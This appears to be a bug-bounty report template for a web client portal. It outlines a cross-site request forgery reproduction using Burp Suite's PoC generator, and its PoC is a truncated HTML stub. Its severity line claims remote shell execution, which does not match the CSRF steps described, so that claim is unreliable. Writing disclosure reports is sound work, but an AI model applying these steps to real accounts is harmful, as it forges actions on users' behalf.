Name: John Doe
Email Address: [email protected]

Affected URL/Area: clienthub.getjobber.com/vulnerablepage

Description of bug in detail

Description of what the bug is and why it’s a bug.

Justification for Initial Severity Assessment

This is critical because a remote shell can be executed on the server.

Steps to reproduce the issue

  1. Login to your account
  2. Click settings & click company setting
  3. Try change company name or phone number
  4. Capture the request in BurpSuite (see screenshot below)
  5. Intercept request---Engagement Tools--- Generate CSRF POC
  6. Copy and paste the generated code to html file, eg exploit.html.

Proof-of-concept

<!DOCTYPE html> <html> <!-- CSRF PoC - generated by Burp Suite --> <body>hidden

Expected results that show bug

Successfully executing the bug will result in [description of what is to be expected]

Evidence to support proof-of-concept

Any images or recorded video that show successful exploitation.

Tools used

Recommendations for fixing and/or mitigation

According to OWASP the recommendations for fixing are: